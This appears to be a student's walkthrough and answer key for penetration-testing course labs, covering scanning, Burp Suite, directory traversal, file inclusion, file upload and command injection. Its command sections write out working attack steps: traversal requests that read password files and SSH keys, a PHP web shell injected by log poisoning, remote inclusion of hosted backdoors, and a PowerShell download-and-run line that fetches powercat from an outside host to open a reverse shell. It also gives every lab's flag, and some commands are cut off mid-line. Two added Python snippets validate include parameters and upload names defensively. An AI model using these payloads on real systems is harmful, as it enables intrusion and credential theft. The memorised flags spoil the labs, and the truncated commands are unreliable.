1. After performing a vulnerability scan on port 8080 (VM Group 1), find a host issue labeled 'HTTP (Multiple Issues)'
in the results.
2. Identify the web server type, and find the version.

Command

3. Nessus can build a Sitemap of a target web server. A Sitemap provides information about the content of a web server
(e.g. pages). Nessus builds it by crawling through links it identifies on pages. Scan the four target machines (VM
Group 1) on port 9999 with the Basic Network Scan template. To configure Nessus to build a Sitemap, click on the
Assessment settings in the scan configuration and select Custom in the dropdown menu. Next, click on Web Applications
and activate Scan web applications. After this, launch the scan. Once it is finished, review the results and analyze
the findings on the Web Application Sitemap. The output provides a list of found pages. On one of these pages, you
will find the flag.

Answer

OS{cb161850e0a8b773044536b6e32c7d74}

View hints

1. Find 'Web Application Sitemap' for discovered URLs.
2. Identify the URL ending with 'flag.html' in the list.
3. Access issues? Clear cache/cookies or use a private/incognito window.

Command

http://192.168.240.13:9999/flag.html

4. The victim machine VM #5 is running a server that contains several vulnerabilities. One vulnerability allows for
directory traversal and arbitrary file access on the target system. Use Nessus to perform a Basic Network Scan of the
victim. Make sure to configure the scan to assess all ports. Once the scan is completed, examine the discovered
vulnerability in the results. As a part of the scan, Nessus was able to read the file C:\Windows\win.ini as a proof of
concept of this exploit. Expand the vulnerability results to view the full content of the retrieved file and locate
the embedded flag.

Answer

OS{e07dbc8ffb39509d41cee38058e07605}

View hints

1. After the scan, seek directory traversal/file access vulnerabilities.
2. Find details and content of C:\Windows\win.ini within the specified vulnerability.
3. Focus on text between lines labeled 'snip' in the file content for the flag.

Command

7.2.5. Performing an Authenticated Vulnerability Scan

Vulnerability Scanning - Authenticated Scan - VM #1

Labs
1. Follow the steps above to perform an authenticated vulnerability scan on VM #1. Review the results of the scan and
analyze the "Patch Report" finding. The report identifies missing patches, with one specifically related to the
Heimdal package. Can you provide the corresponding Ubuntu Security Notice (USN) number?

Answer

USN-5849-1

View hints

1. Consider using a search function (e.g., control/command + F) to help filter through the findings quickly.

Command

The one that returned the fastest response gives the answer (EPSS) = 0.0007

2. Additionally, analyze the "OS Identification and Installed Software Enumeration over SSH v2 (Using New SSH
Library)" finding. The finding includes the output of the uname -a command. What is the kernel version of the DESKTOP
system?

Answer
5.4.0-42-generic

View hints

1. After the scan, visit the 'Vulnerabilities tab' and find the
vulnerability from the specified plugin.
2. Find the answer following: 'The output of "uname -a" is:' in the
output section.

Command

7.2.6. Working with Nessus Plugins

Vulnerability Scanning - Working with Nessus Plugins - VM #1

Vulnerability Scanning - Working with Nessus Plugins - VM #2

Labs
1. Follow the steps above to perform the vulnerability scan on VM #1 with the specified plugin filter. Click on the
vulnerability provided by the plugin on the Vulnerabilities result page and enter the date when a patch for this
vulnerability was published. The information can be found in the Vulnerability Information area under the Patch Pub
Date on the right sidebar.

Answer

January 26, 2021

View hints

1. Explore the 'Vulnerabilities tab' after the scan, focusing on 'High Severity' labels.
2. Dive into the 'Vulnerability Information' of the specified plugin's vulnerability.
3. Locate 'Patch Pub Date' in the sidebar within the 'Vulnerability Information'.

Command

2. The target machine VM #2 is running an IIS web server. Perform an Advanced Dynamic Scan on this system with the
default settings of this template and specify the Plugin ID 11714 in a Plugin Filter. Once the scan completes, examine
the discovered information and locate the flag embedded in the disclosed path. Keep in mind that Nessus shows some
special characters like "{" or "}" as Unicode Hex characters. To provide the correct flag, you will need to substitute
these characters.

Answer

OS{ac053fa38657695f5895baa34ab454c4}

View hints
1. Look for a vulnerability titled 'Nonexistent Page (404) Physical
Path Disclosure' in 'Vulnerabilities'.
2. Find the line starting with 'Path disclosed' in the details of that
vulnerability.

Command

7.3.1. NSE Vulnerability Scripts

Vulnerability Scanning - NSE Vulnerability Scripts - VM #1

Labs
1. Follow the steps above and use the vuln NSE script category against VM #1. Listing 5 shows that the target is
vulnerable to CVE-2021-41773, but the redacted output omits multiple additional found CVEs. Enter one of the other
found CVEs from 2021.

Answer
CVE-2021-44224

View hints

1. Execute the Nmap command as shown in listing 5 and make sure to update the IP address.
2. Filter results using grep for 'CVE-*' patterns.
3. Choose any CVE from 2021, apart from CVE-2021-41773.

Command

sudo nmap -sV -p 443 --script "vuln" 192.168.50.124

7.3.2. Working with NSE Scripts

Vulnerability Scanning - Working with NSE Scripts - VM #1

Labs
1. Capstone Labs: Follow the steps above to perform the vulnerability scan with the custom NSE script on VM #1. Copy
the link from the script output after Verify arbitrary file read: and use it as a parameter for curl. This will
retrieve the content of /etc/passwd of the target machine and display it. Be aware that you need to use http instead
of https while keeping port 443 when you paste the link. Embed the last username of the file in the braces of "OS{}"
and provide it as the answer to this exercise.

Answer

OS{0e9e4eccf43a013e25568382fea0e554}

View hints

1. Ensure the CVE-2021-41773.nse script is acquired from GitHub and integrated into Nmap.
2. Execute Nmap specifying the acquired script.
3. Use curl with the cgi-bin link (using http on port 443) to access /etc/passwd.

Command

sudo cp /home/kali/Downloads/http-vuln-cve-2021-41773.nse /usr/share/nmap/scripts/http-vuln-cve2021-41773.n

sudo nmap --script-updatedb

sudo nmap -sV -p 443 --script "http-vuln-cve2021-41773" 192.168.50.124

curl http://192.168.155.13:443/cgi-bin/../../../../etc/passwd

8. Introduction to Web Application Attacks
8.2.4. Security Testing with Burp Suite

Web Application Assessment Tools - Walkthrough VM #1

Web Application Assessment Tools - Module Exercise VM #1

Web Application Assessment Tools - Module Exercise VM #2

Labs
1. We have been tasked to test the SMS two-factor authentication of a newly-developed web application. The SMS
verification code consists of four digits. Which Burp tool is most suited to perform a brute force attack against the
keyspace?

Answer

intruder

View hints

no hints

Command

no commands

2. Repeat the steps we covered in this Learning Unit and enumerate the targets via Nmap, Wappalyzer and Gobuster by
starting Walkthrough VM 1. When performing a file/directory brute force attack with Gobuster, what is the HTTP
response code related to redirection?

Answer
301

View hints

1. Refer to listing 3 in "Directory Brute Force with Gobuster."
2. For a more detailed explanation of HTTP status codes, we recommend visiting the following: HTTP response status
codes

Command

gobuster dir -u 192.168.155.16 -w /usr/share/wordlists/dirb/common.txt -t 5

3. Start up the Walkthrough VM 1 and replicate the steps we covered in this Learning Unit for using Burp Suite.
What is the default port Burp proxy is listening to?

Answer

8080

View hints

no hints

Command

Open Burp Suite
Start the browser
Turn Intercept on
Go to that browser
Search for that IP
View Proxy tab -> HTTP history

4. We have a lot of mess on our hands, and the new DIRTBUSTER cleaning service is just what we need to help with the
cleanup! You can visit their new site on the Module Exercise VM #1, but it is still under development. We wonder
where they hid their admin portal. Once you have found the admin portal, log in with the provided credentials to obtain
the flag.

Answer

OS{dc1e95100a23ea967bd3fc1e7682cc05}

View hints
1. Refer to listing 3 in "Directory Brute Force with Gobuster."
2. After identifying additional directories, ensure that you log in
using the credentials provided in the Training Library for Module
Exercise VM #1.

Command

gobuster dir -u 192.168.155.52 -w /usr/share/wordlists/dirb/common.txt -t 5

5. The DIRTBUSTER team finally changed their default credentials, but they are not very original. We compiled a list
of potential passwords from the DIRTBUSTER employee contact info at http://target_vm/passwords.txt - I am confident
the password is in there somewhere. The username is still admin, and the new login portal is available at the web
server root folder on the Module Exercise VM #2.

Answer
OS{8592d21d55b4dabcfe908630788d652c}

View hints

1. Download the password.txt file by replacing the target_vm with your assigned VM #2.
2. Repeat these steps using Burp's Intruder to load password.txt.
3. Ensure that you're only scanning the password field.
4. Login with the new password.

Command

gobuster dir -u 192.168.155.52 -w /usr/share/wordlists/dirb/common.txt -t 10

We find the login page.

Using the Burp browser, we send a request to http://ip/index.html/.

We enter admin as the username and send the POST request,

and send that request to Intruder.

After &password, place the two § markers and write anything between them so it becomes the payload position (the variable).

In the Payloads tab, load our wordlist under Payload settings and click Start attack.

In the results, open the answer at the bottom in the Response view and inspect the returned response.

8.3.3. Enumerating and Abusing APIs

Web Application Enumeration - Walkthrough VM #1

Web Application Enumeration - Walkthrough VM #2

Web Application Enumeration - Exercise VM #1

Web Application Enumeration - Exercise VM #2

Web Application Enumeration - Exercise VM #3

Web Application Enumeration - Exercise VM #4

Labs
1. Start up the
Walkthrough VM 1 and modify the Kali /etc/hosts file to reflect the provided dynamically-allocated IP address that has
been assigned to the offsecwp instance. Use Firefox to get familiar with the Developer Debugging Tools by navigating
to the offsecwp site and replicate the steps shown in this Learning Unit. Explore the entire WordPress website and
inspect its HTML source code in order to find the flag.

Answer
OS{2e589a17a825518cc72b39aa394fae74}

View hints

1. Add VM1's IP as "offsecwp" in your /etc/hosts file.
2. Click on links to understand the web application's dynamic pages better. The About us page can be promising.
3. Utilize developer tools; the flag starts with "OS{" and you can search for it directly.

Command

We inspect the page and go through the links one by one.

2. Start Walkthrough VM 2 and replicate the curl command we learned in this section in order to map and exploit the
vulnerable APIs. Next, perform a brute force attack to discover another API that has the same pattern as /users/v1.
Then, perform a query against the base path of the new API: what's the name of the item belonging to the admin user?
NOTE: A dirbuster wordlist should help with this task.

Answer
bookTitle22

View hints

NO HINTS

Command

We create a file called pattern and write the pattern into it.

gobuster dir -u http://192.168.175.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern -t 100

3. This website running on the Exercise VM 1 is dedicated to all things maps! Follow the maps to get the flag.

Answer

OS{3d8108e17702ec60f2e4b7fe6d7ca9ad}

View hints

1. robots.txt and sitemap.xml contain important directories
2. Combine the flags after obtaining the first and second parts.

Command

We open Burp Suite and go to the Site map under the Target section.

We look at http://ip/sitemap.xml.

It gave us the second half of the flag; now we look for the other half.

As we can see, another flag***.html appeared; we send a request to it.

4. Inspect the Exercise VM 2 web application URL and notice if anything is interesting at the URL level.

Answer

OS{1fb07fbce8c156990e9c9b334b49c3bb}

View hints

1. If you encounter server redirection after accessing the exercise IP, ensure curl follows redirects (-L).
2. The flag might be encoded; use tools like hURL to decode it.

Command

We send a request to http://ip/, inspect it, and go to the Network tab.

5. We made another website, but something is wrong. The site is available at Exercise VM 3, but it keeps giving some
weird, non-standard responses. Check out the HTTP headers that accompany this site.

Answer

OS{886a67a5dab3b148ed47f32e904edb67}

View hints

1. HTTP response headers can be added with curl's (-i) option.
2. Analyze the response output for any non-standard header.
3. To obtain the flag, you may need to decode it.

Command

We open Burp and send a request to http://ip/ from the browser; in Burp, there is an encoded flag in the HTTP header.

6. We made this cool website dedicated to the three web amigos: HTML,
CSS, and JavaScript. It is available at the web root on the Exercise
VM 4. Closely review each of the three friends to find the flag for
this challenge.

Answer

OS{48f33e8d146f5e1c3e88eb24aa4ad8cc}

View hints

1. The flag is split into three parts across HTML, CSS, and JavaScript.
2. Examine the application's source code, investigate other .css and .js files, and use console.log for any interesting
function.
3. Combine the flag parts together and submit them.

Command

We send a request to http://ip/ from the Brave browser and inspect it.

The first part is inside index.html.

The second part is inside jumbotron.css.

The third part, in color_flash.js (seen via Burp Suite), is base64-encoded 16 times, so we decode it 16 times.

8.4.5. Privilege Escalation via XSS

XSS - Walkthrough VM #1 192.168.165.16

XSS - Walkthrough VM #2

XSS - Module Exercise VM #1

Labs
1. Start Walkthrough VM 1 and replicate the steps learned in this
Learning Unit to identify the basic XSS vulnerability present in the
Visitors plugin.
Based on the source code portion we have explored, which other HTTP
header might be vulnerable to a similar XSS flaw?

Answer

X-Forwarded-For

View hints

1) Add VM #1's IP address to your /etc/hosts file as 'offsecwp'.
2) Use the same GET request to http://offsecwp/ as shown in Figure 26 in the Basic XSS learning unit.
3) Examine the array in Listing 24 to identify potentially vulnerable HTTP headers.
4) Capitalize only the first letters of each word in the vulnerable HTTP header.
5) Add the header you want to test to your GET request and assess it for a simple XSS payload, as demonstrated in
the course material.

Command

2. Start Walkthrough VM 2 and replicate the privilege escalation steps we explored in this Learning Unit to create a
secondary administrator account. What is the JavaScript method responsible for interpreting a string as code and
executing it?

Answer

eval

View hints

no hints

Command

3. Capstone Lab: Start Module Exercise VM 1 and add a new administrative account like we did in this Learning Unit.
Next, craft a WordPress plugin that embeds a web shell and exploit it to enumerate the target system.
Upgrade the web shell to a full reverse shell and obtain the flag located in
/tmp/.
Note: The WordPress instance might show slow responsiveness due to lack of internet connectivity, which is expected.

Answer

OS{f8b685b91c1f0ab3a69b84532d4a36f5}

View hints

1) For uploading a web shell and receiving a reverse shell on the WordPress machine, please take a look at the
following resources:

https://github.com/leonjza/wordpress-shell
https://rioasmara.com/2019/02/25/penetration-test-wordpress-reverse-shell/

https://pentaroot.com/exploit-wordpress-backdoor-theme-pages/

2) If the website is too slow please try lowering your MTU:

https://help.offsec.com/hc/en-us/articles/360046293832#general-vpn-tips

Command

We go to http://ip/wp-admin/.

We try enumerating users.

No such user exists.

The admin user exists; it said the password is wrong.

From there we try to log in with admin/admin as username and password, but it does not let us in.

wpscan --url <IP> --passwords /usr/share/wordlists/rockyou.txt --usernames admin

The password comes out.

Now we log in to WordPress, and it works; we upload shell.php from the Plugins tab.

We upload it and click ACTIVATE, and then carry out in Burp Suite the same example shown here, using what we
learned above.

9. Common Web Application Attacks

9.1.1. Absolute vs Relative Paths

Labs
1. How many ../ do you need to go from the /var/log/ directory to the root file system (/)? Enter the number below.

Answer

View hints
1. Navigate to the /var/log directory using the command "cd /var/log".
2. Count the number of "../" needed to reach the root directory ("/").

Command

no commands

2. Enter the command in combination with the relative path containing the minimum number of ../ sequences to display
the contents of the /etc/passwd file when the current working directory of the terminal is /usr/share/webshells/.

Answer

cat ../../../etc/passwd

View hints

Command

no commands

9.1.2. Identifying and Exploiting Directory Traversals

Common Web Application Attacks - Directory Traversal - VM #1 192.168.160.16

Common Web Application Attacks - Directory Traversal - VM #2

Labs
1. Follow the steps above and leverage the directory traversal
vulnerability in the "Mountain Desserts" web application on VM #1. Use
curl or Burp to obtain the SSH private key for the user offsec. Use it to connect via SSH on port 2222 and find the flag
in the SSH banner, which is displayed after you log in.

Answer

OS{743c036ca9c244b3e1a0029136867263}

View hints

1. Obtain the id_rsa SSH key file content through the directory traversal vulnerability.
2. Set the correct permissions by running "chmod 400" on the SSH key file.
3. When using the key to connect with SSH, remember to specify port 2222 (-p 2222).

Command

We try sending a request to http://ip/, and it gives us 404 and 403 errors.

http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa

We send a request to this link via curl.

curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa

It gives us the RSA key; we save it to a file,

chmod 400 <RSA_filename>

set the permissions, and try to connect via SSH.

ssh -i dt_key -p 2222 [email protected]

Once connected, the banner gives the flag.

2. The target VM #2 runs Grafana on port 3000. The service is
vulnerable to CVE-2021-43798, which is a directory traversal
vulnerability. Search for "golangexample cve-2021-43798" in a search
engine to get familiar with how the vulnerability can be exploited. Use
curl and the --path-as-is parameter to find the flag in C:\Users\install.txt.

Answer
OS{9bc34ba11067d2feb28438c339e05c3b}

View hints
no hints

Command

Download https://github.com/taythebot/CVE-2021-43798 and use it as follows.

go run exploit.go -target http://192.168.160.193:3000 -file /Users/install.txt

9.1.3. Encoding Special Characters

Common Web Application Attacks - Directory Traversal Encoding - VM #1

Common Web Application Attacks - Directory Traversal Encoding - VM #2

Labs
1. In this section, we used URL encoding to exploit the directory traversal vulnerability in Apache 2.4.49 on VM #1. Use
Burp or curl to display the contents of the /opt/passwords
file via directory traversal in the vulnerable Apache web server.
Remember to use URL encoding for the directory traversal attack. Find
the flag in the output of the file.

Answer

OS{43a040c8e14a03b2e69bd802b587b4de}

View hints

1. URL-encode "../" to mimic the appearance in listing 12 for Directory Traversal.
2. The vulnerability and the URL are the same as shown in listing 12; the only difference will be obtaining the
content of /opt/passwords.

Command

curl http://ip/cgi-bin/../../../../etc/passwd

2. Grafana is running on port 3000 on VM #2. The version running is
vulnerable to the same directory traversal vulnerability as in the
previous section. While URL encoding is not needed to perform a
successful directory traversal attack, experiment with URL encoding
different characters of your request to display the contents of
/etc/passwd. Once you have a working request utilizing URL encoding, obtain the flag by displaying the contents of
/opt/install.txt.

Answer

OS{f6d2bd478b1c756c75632e9049d5400b}

View hints
1. Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
2. URL-encode specific parts of the URL for testing.
3. If you encounter issues executing the Python script, try accessing it through your browser.

Command

go run exploit.go -target http://192.168.188.16:3000 -file /opt/install.txt

9.2.1. Local File Inclusion (LFI)

Common Web Application Attacks - Local File Inclusion - VM #1

Common Web Application Attacks - Local File Inclusion - VM #2

Common Web Application Attacks - Local File Inclusion - VM #3

Labs
1. Follow the steps in this section and leverage the LFI vulnerability in the web application (located at
http://mountaindesserts.com/meteor/) to receive a reverse shell on WEB18 (VM #1). Get the flag from the
/home/ariella/flag.txt file. To display the contents of the file, check your sudo privileges with sudo -l and use them to
read the flag.

Answer

OS{d86d5a7f3458c79e630506d6b5a4d814}

View hints

1. Access the URL as shown in figure 8 to capture the Burp request.
2. Modify the User-Agent as shown in figure 9.
3. Achieve RCE by following figure 10.
4. URL-encode your reverse shell, similar to listing 18.
5. "sudo" is required to read the flag.

Command

Place this code in the User-Agent header:

<?php echo system($_GET['cmd']); ?>

/meteor/index.php?
page=../../../../../../../../../var/log/apache2/access.log&cmd=sudo%20cat%20/home/ariella/f

2. Exploit the LFI vulnerability in the web application "Mountain Desserts" on WEB18 (VM #2) (located at
http://mountaindesserts.com/meteor/) to execute the PHP /opt/admin.bak.php file with Burp or curl. Enter the flag
from the output.

Answer
OS{4fb700458a6d5a0e2c5dc26c9e0c74ea}

View hints
1. Access Admin at the bottom of http://192.168.xxx.xxx/meteor/ to capture a GET request with Burp.
2. Refer to listing 13 and replace the /var/log/apache2/access.log with /opt/admin.bak.php.

Command

/meteor/index.php?page=../../../../../../../../../opt/admin.bak.php&cmd=pwd

3. The "Mountain Desserts" web application now runs on VM #3 at http://192.168.50.193/meteor/ (the third octet of
the IP address in the URL needs to be adjusted). Use the LFI vulnerability in combination with Log Poisoning to execute
the dir command. Poison the access.log log in the XAMPP C:\xampp\apache\logs log directory. Find the flag in one of
the files from the dir command output.

Answer

OS{f5e98290fd841b84fa77684046c08dc4}

View hints

1. Follow the steps in this learning unit, using xampp\apache\logs for log poisoning.
2. If you find any interesting files, read them with 'type '.
3. URL-encode the spaces between the command and parameters with '%20'.

Command

/meteor/index.php?page=\..\..\..\..\..\..\..\..\xampp\apache\logs\access.log&cmd=dir

/meteor/index.php?
page=\..\..\..\..\..\..\..\..\xampp\apache\logs\access.log&cmd=type%20hopefullynobodyfind

9.2.2. PHP Wrappers

Common Web Application Attacks - PHP Wrapper - VM #1

Labs
1. Exploit the Local File Inclusion vulnerability on WEB18 (VM #1) by using the
php://filter with base64 encoding to include the contents of the /var/www/html/backup.php file with Burp or curl.
Copy the output, decode it, and find the flag.

Answer

OS{047f838f32b3bf8400b49a2951d9d0a9}

View hints
1. Follow listing 22 to include base64 encoded admin.php. Replace "admin.php" with "/var/www/html/backup.php" as
mentioned in the question.
2. Inspect the output for a base64-encoded string and decode it to obtain the flag.

Command

curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=/var/www

echo "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJVVEY

2. Follow the steps above and use the data:// PHP Wrapper in combination with the URL encoded PHP snippet we used
in this section to execute the uname -a command on WEB18 (VM #1). Enter the Linux kernel version as answer.

Answer

5.4.0-137-generic

View hints

1. Follow listing 25.
2. Replace the "ls" command with "uname -a" as mentioned in the question.
3. Be sure to URL encode your command.

Command

curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('uname%

9.2.3. Remote File Inclusion (RFI)

Common Web Application Attacks - RFI - VM #1

Common Web Application Attacks - RFI - VM #2

Labs
1. Follow the steps from this section to leverage RFI to remotely include the
/usr/share/webshells/php/simple-backdoor.php PHP file. Use the "cmd" parameter to execute commands on VM #1
and use the cat command to view the contents of the authorized_keys file in the /home/elaine/.ssh/ directory. The file
contains one entry including a restriction for allowed commands. Find the flag specified as the value to the command
parameter in this file.

Answer

OS{04a86c19fcc01514b160947d7bceb6b2}

View hints

1. Follow the steps in this learning unit and make sure to update the IP for your tun0 interface.
2. List the directory, and ensure URL encode any spaces.

3. Read the file present in /home/elaine/.ssh/, ensuring you URL encode any spaces for the flag.

Command

python3 -m http.server 80

curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.45.170/simple-backdoor.php&cmd=cat /

2. Instead of including the /usr/share/webshells/php/simple-backdoor.php webshell, include the PHP reverse shell
from Pentestmonkey's Github repository. Change the $ip variable to the IP of your Kali machine and $port to 4444.
Start a Netcat listener on port 4444 on your Kali machine and exploit the RFI vulnerability on VM #2 to include the PHP
reverse shell. Find the flag in the /home/guybrush/.treasure/flag.txt file.

Answer
OS{64bd31334f4c313a88f1136adc82a49a}

View hints

1. PHP reverse shell
2. After updating the ip and port variables, host the reverse shell with a python HTTP server.
3. Start a nc listener.
4. Use curl to include the hosted reverse shell.

Command

python3 -m http.server 80

nc -lnvp 4444

curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.45.170/php-reverse-shell.php"
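The RFI and data-wrapper payloads in the two labs above only work because the page parameter is handed straight to include(). The following Python snippet is an added example, not code from the course or from the Mountain Desserts application, showing the checks a developer or WAF author would apply to such a parameter: reject remote schemes and PHP stream wrappers, reject traversal, and resolve only against an allowlist. The page names in ALLOWED_PAGES, BASE_DIR and the function names are assumptions made for this example.

```python
import posixpath
from urllib.parse import unquote

# Constructed allowlist standing in for the pages a "?page=" router may include
# (hypothetical names; the real application's page set is not on the page).
ALLOWED_PAGES = {"index": "index.php", "admin": "admin.php", "about": "about.php"}
BASE_DIR = "/var/www/html/meteor"  # assumed document root for this example

# Remote schemes and PHP stream wrappers that turn an attacker-controlled include
# into remote code execution (http, data, expect) or source disclosure (php://filter).
DANGEROUS_PREFIXES = ("http://", "https://", "ftp://", "data:", "php://", "expect://", "file://")


def classify_page_param(raw):
    """Return ("allow", path) for an allowlisted page, else ("deny", reason).

    The value is decoded once, as the router would see it, then checked for
    stream wrappers, traversal, and allowlist membership, in that order.
    """
    value = unquote(raw).strip()
    lowered = value.lower()
    for prefix in DANGEROUS_PREFIXES:
        if lowered.startswith(prefix):
            return ("deny", "wrapper or remote scheme: " + prefix)
    if ".." in value or value.startswith("/") or "\\" in value:
        return ("deny", "path traversal")
    if value not in ALLOWED_PAGES:
        return ("deny", "not in allowlist")
    # Joining an allowlisted basename onto BASE_DIR cannot escape BASE_DIR.
    return ("allow", posixpath.join(BASE_DIR, ALLOWED_PAGES[value]))


def is_rfi_attempt(raw):
    """Log-side check: flag values that carry a remote scheme or stream wrapper."""
    verdict, reason = classify_page_param(raw)
    return verdict == "deny" and reason.startswith("wrapper")


if __name__ == "__main__":
    # Constructed inputs: the first is benign, the rest mirror the lab payloads above.
    for sample in ("admin",
                   "../../../../etc/passwd",
                   "http://192.168.45.170/simple-backdoor.php",
                   "data://text/plain,<?php%20echo%20system('uname%20-a');?>",
                   "php://filter/convert.base64-encode/resource=admin.php"):
        print(sample, "->", classify_page_param(sample))
```

The allowlist is the control that matters; the prefix and traversal checks are there so that a log reviewer can tell an RFI attempt apart from a plain LFI attempt or a typo, and allow_url_include=Off in php.ini remains the server-side backstop for the remote cases.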

9.3.1. Using Executable Files

Common Web Application Attacks - File Upload Executable - VM #1 192.168.221.189

Common Web Application Attacks - File Upload Executable - VM #2

Labs
1. Follow the steps above on VM #1 and exploit the file upload vulnerability. The flag is located in the
C:\xampp\passwords.txt file as a password for the mountainadmin user.

Answer

OS{5f79e9737c1c0f633c7bf62e585fa58e}

View hints

1. Navigate to http://192.168.xxx.xxx/meteor.
2. Use the upload function to upload our /usr/share/webshells/php/simple-backdoor.pHp file.
3. We should now have RCE using this uploaded webshell as shown in listing 30.

Command

At http://ip/meteor/ we upload simple-backdoor.php after changing its trailing extension to .pHP.

curl "http://192.168.221.189/meteor/uploads/simple.pHP?cmd=type C:\\xampp\\passwords.txt"

2. The target VM #2 is running an instance of TinyFileManager. Disable Burp before you start to avoid issues with the
web application. Log in to the web application at http://192.168.50.16/index.php with the user admin and password
admin@123. Find a way to get code execution by using an uploaded web shell. Display the contents of the
/opt/install.txt file to get the flag.

Answer

OS{27080886446fc35d1196a2ccaedcdd76}

View hints

1. Click 'Upload' in the top right to upload your webshell or reverse shell.
2. Alternatively, modify an existing file, like config.php, by replacing its content with your shell.

Command
At http://ip/ we upload simple-backdoor.php after changing its trailing extension to .pHP.

curl "http://192.168.221.16/simple.pHP?cmd=cat /opt/install.txt"

9.3.2. Using Non-Executable Files

Common Web Application Attacks - File Upload Non-Executable - VM #1 192.168.221.16

Labs
1. Follow the steps above on VM #1 to overwrite the
authorized_keys file with the file upload mechanism. Connect to the system via SSH on port 2222 and find the flag in
/root/flag.txt.

Answer

OS{7ef40765a20dac463d7663cb326d44ae}

View hints

1. Follow listing 37 to create a private and public key to use.
2. Capture the upload with Burp and modify the filename as shown in figure 21 so the file is written into root's home directory.
3. SSH to port 2222 with your private key using "-p 2222".

Command

In /etc/hosts we map the target IP to mountaindesserts.com, then open mountaindesserts.com:8000.

We generate a key pair with ssh-keygen and write the public key into authorized_keys:

ssh-keygen

cat filename.pub > authorized_keys

We open Burp Suite, select our authorized_keys file in the upload form and click Upload; before clicking Forward in Burp we change the filename to ../../../../../../../root/.ssh/authorized_keys, which places our file in root's .ssh directory.

Now that the authorized_keys file contains our public key, we can upload it using the relative path ../../../../../../../root/.ssh/authorized_keys. We will select our authorized_keys file in the file upload form and enable intercept in Burp before we click on the Upload button. When Burp shows the intercepted request, we can modify the filename accordingly and press Forward.

rm ~/.ssh/known_hosts
ssh -p 2222 -i fileup [email protected]

After clearing the old known hosts, we connect over SSH with the key we generated, and the connection succeeds.
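Both 9.3.1 (the .pHP extension bypass) and 9.3.2 (the ../../../root/.ssh/authorized_keys filename) come down to trusting a client-supplied filename. This Python example is added here and is not code from the course or from the target application; it shows a filename validator that closes both holes: it lowercases before comparing extensions, inspects every suffix of a double extension, rejects any directory component, and confirms that the normalised destination still sits directly inside the upload directory. UPLOAD_DIR, the two extension sets and the function name are assumptions for the example.

```python
import posixpath
from urllib.parse import unquote

UPLOAD_DIR = "/var/www/html/meteor/uploads"        # assumed upload root for this example
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
# Extensions the web server may hand to an interpreter. Compared in lowercase, so
# simple-backdoor.pHP is treated exactly like simple-backdoor.php.
EXECUTABLE_EXTENSIONS = {"php", "phtml", "php3", "php5", "phar", "asp", "aspx", "jsp"}


def validate_upload_name(raw_name):
    """Return (True, destination_path) or (False, reason) for a client-supplied filename."""
    name = unquote(raw_name)
    # 1. Any directory component is rejected: an upload may name a file, never a path.
    if "/" in name or "\\" in name or ".." in name:
        return (False, "directory traversal in filename")
    if not name or name.startswith("."):
        return (False, "dotfile or empty name")
    # 2. Inspect every suffix (shell.php.jpg has two) in lowercase.
    suffixes = name.lower().split(".")[1:]
    if not suffixes:
        return (False, "no extension")
    if any(s in EXECUTABLE_EXTENSIONS for s in suffixes):
        return (False, "executable extension present")
    if suffixes[-1] not in ALLOWED_EXTENSIONS:
        return (False, "extension not in allowlist")
    # 3. Belt and braces: the normalised destination must still be directly inside UPLOAD_DIR.
    dest = posixpath.normpath(posixpath.join(UPLOAD_DIR, name))
    if posixpath.dirname(dest) != UPLOAD_DIR:
        return (False, "escaped upload directory")
    return (True, dest)


if __name__ == "__main__":
    # Constructed names: the last three mirror the tricks used in the two labs above.
    for candidate in ("report.PDF", "cat.jpg", "simple-backdoor.pHP",
                      "shell.php.jpg", "../../../../../../../root/.ssh/authorized_keys",
                      "authorized_keys"):
        print(candidate, "->", validate_upload_name(candidate))
```

Note that the plain authorized_keys name is refused by the "no extension" rule even without a path, so the non-executable upload of 9.3.2 fails at the first gate; on the server side, storing uploads under a name you generate yourself (rather than the client's) removes the whole class.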

9.4.1. OS Command Injection

Common Web Application Attacks - Command Injection - VM #1

Common Web Application Attacks - Command Injection - VM #2

Common Web Application Attacks - Command Injection - VM #3

Common Web Application Attacks - Command Injection - VM #4

Labs
1. Follow the steps above and exploit the command injection vulnerability on VM #1 to obtain a reverse shell. Since the machine is not connected to the internet, you have to skip the step of cloning the repository from the beginning of this section. Find the flag on the Desktop for the Administrator user.

Answer

OS{5344f71708b215d24e66703cfb658d04}

View hints

1. Follow figure 26 to capture the git clone request.
2. Refer to listing 41 for RCE on the webserver.
3. Use listing 47 for a reverse shell with powercat.

Command

At http://ip:8000 we type something into the submit field and inspect the request in Burp Suite. The archive endpoint is where we get command execution:

curl -X POST --data 'Archive=git' http://192.168.50.189:8000/archive

We then send the following command to check whether PowerShell is available:

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem

Next we stage powercat, start an HTTP server and a Netcat listener:

cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .

python3 -m http.server 80

nc -nvlp 4444

IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell

curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3

We execute this command after correcting the IPs. A reverse shell arrives at the Netcat listener, and we take the flag from the Administrator's desktop.

2. For this exercise the Mountain Vaults application runs on Linux (VM #2). Exploit the command injection vulnerability like we did in this section, but this time use Linux specific commands to obtain a reverse shell. As soon as you have a reverse shell use the sudo su command to gain elevated privileges. Once you gain elevated privileges, find the flag located in the /opt/config.txt file.

Answer

OS{3c35da7d9b4b2b6a1264dd8b795637da}

View hints

1. Follow figure 26 to capture the git clone request.
2. Refer to listing 41 for RCE on the webserver.
3. Enumerate available commands by using "which command" such as "nc" to achieve reverse shell.
4. Remember to URL encode your commands.

Command

